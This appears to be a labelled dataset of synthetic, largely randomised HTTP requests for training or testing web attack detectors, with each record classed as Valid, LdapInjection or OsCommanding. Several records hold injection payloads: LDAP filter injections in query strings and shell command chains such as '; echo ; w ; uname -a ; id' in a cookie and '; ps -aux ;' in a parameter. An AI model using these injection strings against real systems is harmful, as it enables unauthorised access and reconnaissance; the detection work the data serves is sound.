GET /lHM8U95Zkwas-OCx/oQpkm1MD6DHHU/hMe/eMrIledX8/dIjj/anEmkuNadhdtaP/uomaLjhin9iuHd/t0nRLae3.gif?lr=u3xo&Idl=nheEgleqrivi&troirdCWox=smVmt0aStE&i16wtNht4c=jsock_streamt8&109iareea=oh&4cyIx5=f5%7Edm3y%24Nbint%3Avakt&8Ass5wieLt2=ne2stsltAm&5snywsrndZ=3betweend&heiicecun=799 HTTP/1.0
Host: www.ao9arziE.uk
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: x-mac-ce;q=0.4, x-mac-arabic
Accept-Encoding: 
Accept-Language: 70ri5iue-t;q=0.2, d-hSar;q=0.3, 5Abazom-34srnnLt, sgew-cAa6u
Cache-Control: max-age=60
Client-ip: 223.129.57.184
Cookie: CrijhamnnKle=l9kAW;@LmQZ=nHj;3de=%eahn<tw
Cookie2: $Version="19"
Date: Sun, 06 Feb 05 04:00:24 CET
ETag: "FF2Tro_rtx4@In80J"
Expect: 100-continue
From: doe5j@7rdh4elrd.de
If-Modified-Since: Mon, 18 Apr 05 06:59:16 UTC
If-Unmodified-Since: Fri, 05 Oct 07 17:58:24 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 23 May 08 17:00:03 UTC
Max-Forwards: 8
MIME-Version: 2.8
Pragma: aOauas='m'
Proxy-Authorization: teu2uo dsgreat=oatpaa5a
Authorization: NTLM Ym5tMGFuT29lbWVlc21uNW50bmJvb2U1bHNpZ2xuYWVrYVRlZXJhb2F3bHNlc0xz
Range: 487-253698,1-,198-1
Referer: /md8fguh/ynhe/4yos5xa1.dll
TE: gzip,deflate;q=0.8,chunked;q=0.7
Trailer: Proxy-Authorization
User-Agent: gvJpjCwkqP http://www.Jrdyrnip.net
UA-CPU: x86
UA-Disp: 974,643,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 5346x423
Via: FTP/9.4 www.xmbLm.tiff:505
Transfer-Encoding: compress
Upgrade: h3ih9e/0.0, 7mwpye/2.3, Es0/2.7, atargv/1.8
Warning: 816 106.144.10.255 "FhwteaHn0a" "Wed, 27 May 09 19:09:38 UTC"
X-Forwarded-For: 30.15.233.102
X-Serial-Number: 7658038309
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 31207
Start - Id: 30416
class: Valid
GET /a.ibtZV/thrtreoTpoD289Nsch/ayzk96ZFG/aY4/EeSifdL7eIysirnueti.exe?crxwapd=162384&sastomh1rs=neservices+i+&cEeangingResnd3=811045&tftn=5919291 HTTP/1.1
Host: www.a3eve.de
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: *
Accept-Language: sp-emnn;q=0.2
Cache-Control: max-stale
Client-ip: 180.57.71.245
Cookie: Se=sfe;44O3mOoP9kS.=593
Cookie2: $Version="977"
Date: Sat, 16 Jan 10 24:24:36 UTC
ETag: W/"sUhkYg9F@x81qi5"
Expect: boqlnoRo
From: wmReuit@hemuh5.fr
If-Modified-Since: Tue, 20 Apr 04 10:51:56 CET
If-Unmodified-Since: Sun, 03 Feb 08 14:59:18 CET
If-Match: "xSGfsuMbuYbCsajEIP-"
If-None-Match: "z@nZHjS_d7I1U8yAe2JF"
If-Range: *
Max-Forwards: 115
MIME-Version: 0.2
Pragma: ofieips=rnae
Authorization: Teo5t oarc=tnaa
Referer: http://Naahl.com/bfiBalhh/laea/tcerewe.asp
TE: gzip
Trailer: Authorization
User-Agent: Mozilla/5.3 (Machintosh; U; Mac OS X 4.2; te-tq; rv:6.4.7) Gecko/84817427
UA-CPU: x86
UA-Disp: 1255,973,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 094x400
Via: 6.6 163.166.65.24:94
Transfer-Encoding: compress
Upgrade: Itrr/4.9, dhnuRy/2.8, stitY/4.6, ayczo/5.8, et7hnu/4.7
Warning: 485 87.113.145.16 "tapaxhedta" 
X-Forwarded-For: 97.116.231.157
X-Serial-Number: 17997505261977757757
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30416
Start - Id: 9166
class: Valid
GET /eD0bnAZW..JR3JdIMs4/iF36_k2GrzcfhNQwO/e1Fj8_QTIn@kB/9vuLQL/rlO/9siei4k0j4metho/ycerNthmv4irwDtroncl/yreq3tIpueavhl.mdb?lr=0776&r2dircen2wYeiiA=239797&tjndvak=ojnn&NyMf=lXFzFMQ3qe&scuiothie=919164774&ren=lon&shutdown6rBYV=9&2y=u730 HTTP/1.1
Host: www.arli4hYr6.fr:10253
Connection: keep-alive
Accept: text/plain;q=0.2
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: iBTaT0-Tthts
Cache-Control: only-if-cached
Client-ip: 22.93.175.140
Cookie: _VUyZQopenXv@f=sr2ptrizie9a;nr8SUX8_img=76579;nlyfapayeejY=493;ao9onasduap= $bqh
Cookie2: $Version="237"
Date: Thu, 18 Mar 10 05:28:28 UTC
ETag: W/"-fmhV-@Ije5xJ9oFP"
Expect: 100-continue
From: fwtTde@tnn0ld58.biz
If-Modified-Since: Sun, 06 Aug 06 07:53:15 CET
If-Unmodified-Since: Mon, 07 Aug 06 16:46:00 CET
If-Match: "op_SLdSNz7XIiGI"
If-None-Match: "Q-@3JcdonPVlQHL"
If-Range: *
Max-Forwards: 60
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: ktOzu w5Tane=sisl
Authorization: ccien ezres=wwlen
Range: -7586
Referer: http://www.Ora5t.cz/taeeprmY.cfm
TE: trailers
Trailer: Connection
User-Agent: Mozilla/0.8 (Machintosh; U; PPC 1.2; ot-pm; rv:5.7.3) Gecko/07112654
UA-CPU: MIPS
UA-Disp: 226,033,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 001x9335
Via: 9.0 97.174.222.66, 9.3 200.45.110.139:96, 0.5 24.229.194.210
Transfer-Encoding: deflate
Upgrade: mapEt/8.1, RNae/5.1
Warning: 905 www.dgfeerSr.html:96082 "t0ewrycrethaeHou7" "Thu, 31 Mar 05 07:13:11 GMT"
X-Forwarded-For: 98.82.13.56
X-Serial-Number: 3795859892
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9166
Start - Id: 21043
class: Valid
GET /5mj/cqWhwEcP9DxwH/AmfWhtaccesH7i/KeAupdateOlXAaECzaKn/w8jdW16/omVqrQTZIjl8gMpL/Qg1U4scriptc1zfD/ntiaternfpri/copystyleEreplaceikUWbetweenywR/rel.tiff?F5locationeKm=-j+eemsa%7Cdprocessing-instructionpo%28%3Dm&hyI=itnsxEuqicn&bxqO=lTFqbp.vL5&oseftsqact=1137&arss=04367&owAl2G3hG=%25ds&my9ns8a8kaH=e%24nodemao-a&tnoyOdam=3m4vIR&ZlikerqxFg.3=44891&un=sUI4&kSt6teUcznemdz5=am%5D&gecdbErtomeeto=oiptelnet%3BeLqt&reaohE2ToArash=yaoehn%28tdrop HTTP/1.1
Host: www.swcsbewn.fr
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: no-store
Client-ip: 172.161.227.48
Cookie: lmesorlraauNo=x5o:;s7OKlIxmlthCI0d=9oaconnecteltvier
Cookie2: $Version="01"
Date: Thu, 20 Mar 08 04:14:36 GMT
ETag: "enp0VzH7u_wCvwnDQ"
Expect: rnms
From: hrtiet@tsotaco.it
If-Modified-Since: Sun, 03 Jul 05 10:29:17 UTC
If-Unmodified-Since: Fri, 09 Apr 04 14:36:33 GMT
If-Match: ".er3eceVeYyvEoh0A"
If-None-Match: *
If-Range: Thu, 17 Dec 09 17:02:24 UTC
Max-Forwards: 049
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: Basic b2h0cGVlbDpsbHFzZGlt
Authorization: Basic MmVvb3BuOnR0dGRv
Range: 98-,136-
Referer: http://ephTth.biz/nuun7et/ksOds0/eetu/aql9i/dtos2.aspx
TE: deflate,deflate;q=0.9,gzip
Trailer: If-Modified-Since
User-Agent: i9ttea
UA-CPU: 68000
UA-Disp: 2624,2413,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 523x776
Via: FTP/7.4 www.hilta.png, 9.6 www.ziten.png, 5.7 176.134.64.65
Transfer-Encoding: compress
Upgrade: uJeot/0.3, ludozl/7.4, ha1UeU/7.0, e7d/1.7
Warning: 623 98.104.50.147 "rrdkqSloae" 
X-Forwarded-For: 120.235.145.125
X-Serial-Number: 650978480578430420
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21043
Start - Id: 33984
class: Valid
PUT /na-7uUdMzCf/lonsomespt/o8/yjpnEsKLaVrSDkY-/R_0e6wLihavingq5pGo/8cnsoPtyRslePrd/mmny/g9ZU58i2_nJdS/FzYQD.hW/Cnhs.swf? HTTP/1.1
Content-Length: 39
Content-Language: o,h
Content-Encoding: deflate
Content-Location: /egivuaj/ano0e1c/ahun.dll
Content-MD5: dW50dG5pZW10aWM0Y2kwbA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 10 Jan 05 15:20:12 GMT
Last-Modified: Fri, 27 Jan 06 16:05:42 UTC
Host: www.esnt.gov
Connection: close
Accept: video/quicktime, application/postscript
Accept-Charset: *;q=0.7
Accept-Encoding: compress;q=0.6, compress, identity;q=0.6
Accept-Language: euo-ecr6m;q=0.6
Cache-Control: only-if-cached
Client-ip: 68.254.57.254
Cookie: khoLhryeeraE=nosI4N;ri1DfH8m=ocebe2sotci1coW;imitncshai=35;Twk166ahst=shTOl;yosEantLY=tlodb27io
Cookie2: $Version="260"
Date: Thu, 19 Jun 08 06:30:32 GMT
ETag: "_a0_64jbSCr6SnLUs"
Expect: 100-continue
From: 2lttn@aSarnOJ.de
If-Modified-Since: Sat, 06 Mar 04 22:39:35 UTC
If-Unmodified-Since: Fri, 29 Jan 10 11:41:03 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 732
MIME-Version: 6.3
Pragma: uUte='kaf93bh'
Proxy-Authorization: Basic Y3RpbGhiaEU6aWdubHRobVI=
Authorization: nesrib ojSla99R=pbhh5S
Range: -4
Referer: /Iwrnooii/dsaylytn/pa0e/dsvhtte/mgaassve.php3
TE: trailers,gzip;q=0.3,deflate
Trailer: Authorization
User-Agent: Mozilla/3.2 (Machintosh; U; PPC 6.3; ri-ms; rv:1.8.4) Gecko/91484082
UA-CPU: Sparc
UA-Disp: 370,676,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 354x173
Via: 0.7 228.157.101.7, HTTP/5.6 www.eaTt4E.jpeg, FTP/4.7 www.ryla.tiff
Transfer-Encoding: compress
Upgrade: tiy/3.6, xma/2.7, hcenti/3.5
Warning: 702 237.154.44.239:055 "adahlhccmtnRndtt" "Thu, 03 Sep 09 08:04:46 UTC"
X-Forwarded-For: 48.2.222.131
X-Serial-Number: 33226
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

TtT2fecTzahtro4=euxaa&oqdFd6dpq00=bh86M

End - Id: 33984
Start - Id: 38244
class: LdapInjection
GET /PhS/srpTteuensemie/eEloiArj59rhad/KwDxaTXoptxyCadminI/NklSechild/anmyYapyersofzlii/thv54EO6HIoIix/tunrtanerieeeann5oe/6RK50EMr9izQO./eWQ@XBsLcq/boqSoHacns4tCodi/rLqgk-MVXnQsxtTjR13.php4?iE87e=oh%27p%3El4&svn1sosSt0udyst=712906&o1nanrn8non=Odt&rklps2nio75n=oh&o6DdRLxp_N=%29+++%28%7C++++%28displayName%3Dhad*%29++%28name++++%3D+had*+%29%28++++mail%3Dhad*+++%29&cnoncnok2AeF=bdaPgneaiiai&ie=1085&oidosndl19r=cibAvnzn9NKd HTTP/1.1
Host: 125.45.85.244
Connection: close
Accept: */*;q=0.1
Accept-Charset: windows-1252, x-mac-greek, x-mac-turkish;q=0.6, koi8
Accept-Encoding: *;q=0.1
Accept-Language: t5giit-teagodea
Cache-Control: max-age=753
Client-ip: 25.111.195.232
Cookie: fromat_open3likeB=840910737;eixdAtw=301013;i4lans3j=891;uZqLOw0a=fco
Cookie2: $Version="6"
Date: Tue, 12 Apr 05 09:05:31 UTC
ETag: "EohbH0xlmOltEeMQrTE"
Expect: lereii
From: Oni9Cjt@Idhlgm9aom.net
If-Modified-Since: Thu, 23 Sep 04 21:14:01 UTC
If-Unmodified-Since: Tue, 21 Feb 06 20:08:52 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1307
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: hgak4o jyhewio=ntfs
Authorization: wtahel auxc9d=5nTomi
Range: 298-,-99
Referer: http://www.lopb.com/othtlhb/lyndae9/Hhnriocl/taddswea.nsf
TE: trailers,deflate
Trailer: Proxy-Authorization
User-Agent: uDair/3.5.8
UA-CPU: PowerPC
UA-Disp: 8634,303,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 265x803
Via: 7.5 231.130.163.48, FTP/3.4 145.200.243.249
Transfer-Encoding: mhnse; ua9c3=qoDaosef
Upgrade: eddcT/3.3, roas/0.6
Warning: 960 www.duToe.shtml "ptStgi2naAcbsign2b" "Wed, 02 Nov 05 20:39:52 UTC"
X-Forwarded-For: 188.85.68.116
X-Serial-Number: 6643372694358822
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 38244
Start - Id: 3065
class: Valid
GET /tAtC4UfinputKUvprf/wstn5rtewaee1y/qyD/av.css?tlTqrffkIaiz=Ewde9rhdttssee&oetqz9=ous&tinevnaumsia=dVm&intoNqliFei1iil=34125&lOuehIo=0214855784&iaTp=0&4pne3d1essehzo=tt&OESre1Eeefdriva=orenullpaeg-4o&mSnltumg=p&Hoa=056035&bsvinncmdPQ=09&wnulljvCkBr=71077132 HTTP/1.1
Host: 171.176.101.117
Connection: ihez
Accept: image/*, application/*;q=0.4
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: 63mys=srhhpit
Client-ip: 77.193.90.162
Cookie: gu=eRnJ;h7er1aoCmNzuo=777817;betcKxf29A.=4<3mwb=a;lTmsedet= ;qx1-Q@.=h
Cookie2: $Version="440"
Date: Fri, 16 May 08 13:29:09 GMT
ETag: "L8zPejW4qcs5OUwj"
Expect: 100-continue
From: aCahNpEs@etrihpeiit.de
If-Modified-Since: Sat, 18 Oct 08 01:14:17 UTC
If-Unmodified-Since: Sun, 21 Jun 09 18:39:42 UTC
If-Match: "bsiwqUl_M4HkbM@p7_"
If-None-Match: *
If-Range: "7WUDosanhQuXoeyFZZ"
Max-Forwards: 312
MIME-Version: 8.9
Pragma: mnt4e=erun
Proxy-Authorization: Digest uri=http://www.i1os.gov/snticue/o7oas/eeeoqf/lala.gif
Authorization: Digest realm
Range: 4367-,7652-,-5
Referer: /imqn.jsp
TE: trailers
Trailer: Trailer
User-Agent: vm8u (y4nqMd4MT; bJ3OKALwdS)
UA-CPU: Sparc
UA-Disp: 9893,395,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9081x8193
Via: 7.6 www.rbtR.shtml
Transfer-Encoding: identity
Upgrade: TyHs9i/8.3, tlee/0.2, 3Drt/8.0, nnuEe3/5.2
Warning: 569 www.oeereniu.htm:0303 "atsetrg" "Wed, 17 May 06 18:16:08 CET"
X-Forwarded-For: 54.60.0.87
X-Serial-Number: 79351042472156559
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3065
Start - Id: 18590
class: Valid
GET /xFFn4pUC/dFnw9spi5ncResr/aYaviauezieaeva/e9U9R7BGp93ne/es.yoL.AcNK-vG.DW/n5NyMK/lX-vd/i8@fQP/fhOMBftpSrXR/rT/XwconnectTuiHN5Kt/iahrciEttud3eEn.gif?Eta=ioteaedo&reir3ajJorslnv=doAy%29&Mif_3=iq6.&Tfb=Cnhm4atihahgm9rui6&istdinUJchildap=75&sWsinr4sitxes4a=hs%3F&niLgeaTxgi=e%28Et%3C+t&17=BCs&hlFlrekny3g=psreeeineSpoxo%3B+&-.KCKUL=hmf HTTP/1.0
Host: 178.63.207.244
Connection: keep-alive
Accept: */*
Accept-Charset: cp-936
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: e='ssltme'
Client-ip: 135.64.72.193
Cookie: Em3laevi=19648465;ipo=htaccese;eSmia8t=dypooeo~o
Cookie2: $Version="572"
Date: Sat, 19 Mar 05 20:12:05 UTC
ETag: "jW@o8elGhjr53bLTQbG5"
Expect: 100-continue
From: tyie@t8hupt4y.biz
If-Modified-Since: Sat, 06 Nov 04 05:40:04 UTC
If-Unmodified-Since: Mon, 16 Apr 07 01:31:14 CET
If-Match: "7G5EkaWh.RDyA8Y"
If-None-Match: "ciokpJYuXBP7pqig"
If-Range: Fri, 18 Feb 05 17:46:23 UTC
Max-Forwards: 443
MIME-Version: 4.8
Pragma: to=n
Proxy-Authorization: NTLM ZXB1ZWJyZXJlb29jVmk1c2VocnRUYW9kdGdsdHJ0ZmVsbkd0
Authorization: NTLM em5pbUFpZHJ0aDA2b2FmN2hnZmF0MWJ2OEU4cm4zdGVuOA==
Range: 24-
Referer: /colhs/lcdt.shtml
TE: deflate;q=0.9,chunked
Trailer: If-Range
User-Agent: Mozilla/5.4 (Machintosh; U; Mac OS X 6.5; qA-lo; rv:8.5.9) Gecko/42377390
UA-CPU: StrongARM
UA-Disp: 973,9699,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 924x1764
Via: FTP/4.5 www.eAzdnv.jpg, HTTP/2.3 91.10.44.117:01, r2ercc/2.7 68.60.37.182
Transfer-Encoding: identity
Upgrade: fsooht/0.4, Rtho/8.1
Warning: 224 www.anwi.tiff:36 "snstrTt" "Mon, 04 Jun 07 16:58:27 GMT"
X-Forwarded-For: 217.72.159.71
X-Serial-Number: 74074067
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18590
Start - Id: 43328
class: OsCommanding
GET /to6Tln/ot/FWu8zBw4Afbm/6mQA2trrldoA/jB4K5OaC@HC7dHhj_X/V5XW-/rratAemimtthe/alspireshtccniese.jpg?hni=%27++%3B+++++ps++++-aux++%3B HTTP/1.1
Host: www.v6srnap.biz
Connection: close
Accept: */*;q=0.7
Accept-Charset: x-mac-turkish;q=0.7, x-mac-greek, iso-8859-8, x-mac-cyrillic, x-mac-cyrillic;q=0.8
Accept-Encoding: *;q=0.2
Accept-Language: cye-90dt9, oB2fse-rcn;q=0.1, hdfs04cr-feeqe, rOeac-8e
Cache-Control: min-fresh=518
Client-ip: 39.1.82.102
Cookie: xsdajntar=375381;dt0Eda=ads;GAaiqCniv=584
Cookie2: $Version="66"
Date: Fri, 10 Jun 05 14:11:08 GMT
ETag: "5F2mdw-ISzpqHGdoB7n"
Expect: 100-continue
From: u2ou5He@loliohda.uk
If-Modified-Since: Sat, 29 Sep 07 11:14:04 UTC
If-Unmodified-Since: Sat, 03 Jun 06 13:23:21 UTC
If-Match: "pWxo_hYQp-vFh5zxFY4i"
If-None-Match: "5Ft8m7x2.D.4CZLX"
If-Range: "FGhVXN98XmIcB8EEX5"
Max-Forwards: 73
MIME-Version: 1.2
Pragma: no-cache
Proxy-Authorization: NTLM b2ZsaTZkVHVubWVyOTQ4YVFhdWVpc2RZbWFsc3ppaWR4V2VldHdobnJlZQ==
Authorization: otoo itqu6=kdmai
Range: -3
Referer: http://artpI5ch.st/iaayst4s/Bhtjej.swf
TE: trailers,trailers,gzip
Trailer: Via
User-Agent: Mozilla/1.2 (compatible; MSIE 1.8; SunOS sun4u; saee; tFai7aOm; sjpetixtoh)
UA-CPU: 68000
UA-Disp: 260,218,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 105x8065
Via: FTP/9.5 www.aoiIei8A.shtml, 2.9 www.C5tvpm.js, FTP/1.2 156.245.175.107
Transfer-Encoding: deflate
Upgrade: EC4/0.8, cEeq/4.6, ezga1/4.0, sop/3.8, d63oen/6.6
Warning: 701 130.228.213.242 "weeAeeiqooatnpcr" "Sat, 22 Oct 05 10:49:54 UTC"
X-Forwarded-For: 213.135.117.46
X-Serial-Number: 356926769417178111
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43328
Start - Id: 15276
class: Valid
GET /S9nam1Ws.mdb? HTTP/1.0
Host: www.srsdgpeew.ch
Connection: sioiencp
Accept: */*;q=0.3
Accept-Charset: cp-950;q=0.9
Accept-Encoding: compress, identity;q=0.7, identity, deflate;q=0.6, deflate;q=0.5
Accept-Language: nGnbA-teg;q=0.9, eoenc-qut;q=0.9
Cache-Control: no-cache
Client-ip: 0.136.238.190
Cookie: Sneuvit7o4ahln=55857205;rotuehaamtmrpmv=a0a ;yg6luma=dHHa;ei=rh;ye=sktuXCeD;oE0bOp6vedwsr=nnrehaest
Cookie2: $Version="4"
Date: Tue, 02 Mar 10 09:17:06 GMT
ETag: "vT9xqkIghaOWZ3nq.oJ."
Expect: 100-continue
From: 4b6lt@iaCisxokO.it
If-Modified-Since: Fri, 27 Nov 09 09:04:45 CET
If-Unmodified-Since: Mon, 06 Oct 08 18:04:28 GMT
If-Match: *
If-None-Match: "Y58nJd4u@z8m6lr.7TaK"
If-Range: Fri, 08 Oct 04 04:14:50 UTC
Max-Forwards: 5
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: trorct ST2dgta5=nnois
Range: -425
Referer: http://www.iCaAT0.ch/f7hlLS/e4euTd/nh0lFW5/e2xdi.html
TE: trailers
Trailer: If-Match
User-Agent: ilb2arh1
UA-CPU: StrongARM
UA-Disp: 8576,0816,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 9424x098
Via: 6.9 www.heutnd.shtml, 9.3 154.82.172.196:0, 6.4 110.241.43.202
Transfer-Encoding: g43d
Upgrade: b6ii0/3.3, tteonn/2.3, yey/0.7, ic6n8/2.9, a0t/1.3
Warning: 995 172.185.188.148 "OcSZC" "Sat, 30 Jul 05 15:15:26 UTC"
X-Forwarded-For: 186.177.123.173
X-Serial-Number: 193733514519780157
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15276
Start - Id: 42992
class: OsCommanding
GET /8o/hfDE2XLT-lCAD/ilscHeEhsxamdru/fr41/ktaener4aifop13cre/lKXMZu2rCirXq7ZC.shtml?2FHeTTkJaBJQ=18129993&til2vh6goefp=f%2B%2F&997Q=cuOb8&th=428085&winnt_hQMak.Jjb-=passwdqd&Cieenmt3=8e8chSljhupdate58r HTTP/1.1
Host: www.hsamctae.cz
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.2
Cache-Control: max-stale
Client-ip: 151.136.198.56
Cookie: eaaajdifdt= ;     echo ; w    ;  uname  -a      ; id;eni7nTeraTigloi=ylcclxeusidi;JUoptd8T@@=astdinddvaae:Tno?
Cookie2: $Version="767"
Date: Mon, 27 Jul 09 19:04:42 CET
ETag: W/"kdLJHbutb6RMAdw2uu2"
Expect: 100-continue
From: aAe1ape@rjeoIhdn.net
If-Modified-Since: Fri, 19 Aug 05 19:36:11 UTC
If-Unmodified-Since: Mon, 29 Jan 07 15:57:32 UTC
If-Match: "yd28s9nyhxdMfhSsRFl"
If-None-Match: *
If-Range: Thu, 11 Sep 08 05:08:20 UTC
Max-Forwards: 0735
MIME-Version: 7.5
Proxy-Authorization: laahq noaeo=epl8
Range: -824908
Referer: /eomG.exe
TE: trailers,chunked;q=0.9
Trailer: User-Agent
User-Agent: iSanH (il_23vQ; aBIEj@Bgm; t.wOJCee; a.fEoPDOCt; hiP15Njjo)
UA-OS: WinNT
Via: Frnebh/4.8 www.eIasycss.htm, 1.1 www.hre3i.js:3558, 6.4 www.sed5at.js
Transfer-Encoding: compress
Upgrade: 5sZar/3.5, hg2/7.4, hai/2.7
Warning: 257 40.218.139.79 "wigetselds1erfEotm" "Wed, 07 Apr 10 24:49:11 CET"
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42992
Start - Id: 33561
class: Valid
POST /reqtnve43Oa1wnMa/svDNrsz7W37wwK/t5inshananEpts/oe7eDpEeerhoeet2kgne/Yh9FUaccess_logwVivcatE/oaI/2wx.tiff? HTTP/1.1
Content-Length: 117
Content-Language: ai8,nagha
Content-Encoding: identity
Content-Location: /nAnr6/iceh.php
Content-MD5: RjhleXJlY3J1Y29zZWw3bg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 14 Oct 09 21:55:19 GMT
Last-Modified: Wed, 30 Jul 08 01:50:46 GMT
Host: 133.92.121.92
Connection: keep-alive
Accept: image/png;q=0.4, video/quicktime, text/plain
Accept-Charset: euc-cn;q=0.7, x-mac-arabic, iso-8859-9;q=0.7, iso-8859-7, euc-kr
Accept-Encoding: compress
Accept-Language: *;q=0.7
Cache-Control: only-if-cached
Client-ip: 83.91.209.204
Cookie: k1urecgi9ef=ng4raU
Cookie2: $Version="77"
Date: Mon, 19 Jan 04 06:29:25 CET
ETag: W/"G4y63TaRjt6qV8P5.YwZ"
Expect: 100-continue
From: nndz@n7ls.fr
If-Modified-Since: Fri, 07 Jan 05 14:38:19 CET
If-Unmodified-Since: Sat, 31 Jan 09 07:54:03 UTC
If-Match: "_yX-26cT-0X_@4EBLB"
If-None-Match: *
If-Range: Sun, 27 Nov 05 02:47:35 CET
Max-Forwards: 63
MIME-Version: 5.2
Pragma: uhoSess='t1xntprv'
Proxy-Authorization: NTLM aXJlbHBlNHRsazdsbGZpbmh0cmVpZXNzdXlnbGVrN2lpbjZuc2ZlMW90ZXJy
Authorization: NTLM ZmVlbmV0dG91ZXd0T2VhM2lGNkw3VGVtYWF3YXRvSWF0bnMzY2U=
Range: -842
Referer: /Hdrte/upstmn/gnR5E.jsp
TE: chunked;q=0.2,trailers
Trailer: Transfer-Encoding
User-Agent: havaER http://www.onto.be
UA-CPU: PowerPC
UA-Disp: 3018,583,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 417x756
Via: 2.7 www.cesd.gif, 7.3 www.adtOtxc.jpg, 8.7 www.eete.gif
Transfer-Encoding: rej8
Upgrade: rgdr/2.7, pttC/2.5, tte/1.7, eqltXw/6.0, NuhE/6.5
Warning: 904 254.251.47.53 "9tyslbOtj" "Fri, 25 Nov 05 09:55:02 UTC"
X-Forwarded-For: 188.249.94.253
X-Serial-Number: 2914047
----: -----------------
~~~~~: ~~~~~~~~~~~

inennmdiw=24868383&to9Ehsde=ter&fyiuahwc=ttjUi5&h8QEsHhlw=enhhiFEslecolug&gHw8DqdarD= Osoh&yy8fUPxMhF4=10&nzi=1214064

End - Id: 33561
Start - Id: 38584
class: LdapInjection
GET /e2z3nhBOsAkWOp/RZer9akld/oL-9IL@WER/8ej29-QZU5/xg4rg0PU5nY7qUM1bTWl/Esierporin3tmtw5n/lw2mcIwxoKvj/aU1.tiff?r2iu6iMdoweZ=q&kOngbte8iDyHeil=053983414&iEhoercoaep=4198&ddsse=0542336&ri5r=ahe&vzdu-ID-0htaccesIbgsound=yBlqbhUAtHDC&shoelrdnua=ssnt%29%28%26%28objectClass%3D+oE*%29 HTTP/1.0
Host: www.i4joote9.net
Connection: close
Accept: image/gif, audio/basic;q=0.6, image/jpeg
Accept-Charset: x-mac-japanese;q=0.1, x-mac-hebrew, x-mac-roman;q=0.4, iso-8859-3;q=0.7
Accept-Encoding: *;q=0.9
Accept-Language: mrnawoa-n, een1ihy-soeotteu, g5a4n-y;q=0.6, dhnCk-l, 7rh-btbfslN
Cache-Control: only-if-cached
Client-ip: 97.13.224.109
Cookie: rK1R=68z04H-eW;diuhtxemw6AtaHu=sm;zQjl-=tr8qrrlh;iwayjpnnewlllo=91
Cookie2: $Version="7"
Date: Sat, 20 Mar 04 08:57:52 UTC
ETag: ".vmGL4dNEJ0K.I9o"
Expect: 100-continue
From: pyIBk@eedSVf1mn.cz
If-Modified-Since: Thu, 29 Jan 04 05:22:33 CET
If-Unmodified-Since: Sun, 01 Jan 06 18:19:13 CET
If-Match: "0vnOvk8TBkzBcSRR"
If-None-Match: "sfU8W8h2F5xRP9Dm"
If-Range: "Hp.QnwaMvJLaFhvNqHSS"
Max-Forwards: 8
MIME-Version: 6.9
Pragma: 8='nesf'
Proxy-Authorization: Digest nc=862e2FDb
Authorization: Digest opaque="rseh"
Range: -5
Referer: http://cmDesoty.gov/eobgT.jpg
TE: trailers,trailers,deflate
Trailer: Proxy-Authorization
User-Agent: 4gisuaed (tL.S_66Dw)
UA-CPU: 68000
UA-Disp: 9162,3647,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 7804x6342
Via: rek/3.4 www.mSe2.js, 2.2 164.223.38.240
Transfer-Encoding: gzip
Upgrade: ksu/7.2, ear/3.1
Warning: 494 www.yte1Tn.shtml "iewe" 
X-Forwarded-For: 157.225.217.71
X-Serial-Number: 0288802054604644545
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38584
Start - Id: 37828
class: LdapInjection
